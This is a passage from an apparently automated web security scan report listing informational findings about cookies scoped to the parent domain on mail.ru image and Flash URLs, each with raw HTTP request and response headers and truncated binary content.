......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...

15.67. http://r2.mail.ru/b12887677.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887677.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887677.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:35 GMT
Content-Type: image/jpeg
Content-Length: 3066
Connection: keep-alive
Set-Cookie: p=AtoGAEnndQAA; expires=Wed, 24-Apr-13 14:21:35 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:35 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...

15.68. http://r2.mail.ru/b12961140.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961140.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961140.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2105
Connection: keep-alive
Set-Cookie: p=wfsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...

15.69. http://r2.mail.ru/b12961154.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961154.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961154.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1321
Connection: keep-alive
Set-Cookie: p=XOcGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...

15.70. http://r2.mail.ru/b12961373.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961373.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961373.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2341
Connection: keep-alive
Set-Cookie: p=0+oGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................D.Z.."..............................
...[SNIP]...

15.71. http://r2.mail.ru/b12962356.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12962356.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12962356.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:29 GMT
Content-Type: image/jpeg
Content-Length: 2232
Connection: keep-alive
Set-Cookie: p=BPIGAGGvrgAA; expires=Wed, 24-Apr-13 14:21:29 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:29 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

15.72. http://r2.mail.ru/b12963308.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12963308.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12963308.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1983
Connection: keep-alive
Set-Cookie: p=k+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

15.73. http://r2.mail.ru/b12965362.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12965362.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12965362.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1986
Connection: keep-alive
Set-Cookie: p=cuoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

15.74. http://r2.mail.ru/b12968616.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12968616.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12968616.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 7638
Connection: keep-alive
Set-Cookie: p=+dsGAErbVQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......Exif..II*.................Ducky.......d.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

15.75. http://r2.mail.ru/b12979027.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12979027.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12979027.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2333
Connection: keep-alive
Set-Cookie: p=y6YGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...

15.76. http://r2.mail.ru/b13039712.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13039712.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13039712.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 1491
Connection: keep-alive
Set-Cookie: p=9doGAErbVQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

15.77. http://r2.mail.ru/b13044176.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13044176.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13044176.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 2252
Connection: keep-alive
Set-Cookie: p=JAEHAEmt3gAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................    .    ..
...


......    ...........C.......................................................................2.2.."..............................
...[SNIP]...

15.78. http://r2.mail.ru/b13049054.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13049054.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13049054.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 19587
Connection: keep-alive
Set-Cookie: p=CeQGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H....
FExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:39:59.........
...[SNIP]...

15.79. http://r2.mail.ru/b13050852.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13050852.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13050852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 15500
Connection: keep-alive
Set-Cookie: p=ZvYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....TExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:43:30.........
...[SNIP]...

15.80. http://r2.mail.ru/b13057590.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13057590.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13057590.swf HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:52 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 21720
Connection: keep-alive
Set-Cookie: p=1vsGAEvDVAAA; expires=Wed, 24-Apr-13 14:29:52 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:29:52 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

CWS    .x..x...u\U].7.N.-]...t..HwHs...i.)..QBP.AZ..D.E..T@QJE.l.....u...<...>...q..f......Y........p...`@..@?'.......".b.............0...a..A.h....S.u1.....P.....#..1....}...    U]....... ....'.........
...[SNIP]...

15.81. http://r2.mail.ru/b13058787.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058787.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058787.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3168
Connection: keep-alive
Set-Cookie: p=9okGAHCbTwAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95
...C.....................................    ...    ......    


.....
.    


...C...........
...



...[SNIP]...

15.82. http://r2.mail.ru/b13058840.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058840.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058840.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1736
Connection: keep-alive
Set-Cookie: p=G+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

15.83. http://r2.mail.ru/b13058851.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058851.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058851.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1405
Connection: keep-alive
Set-Cookie: p=r+cGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

15.84. http://r2.mail.ru/b13058852.jpg  previous  next

Summary

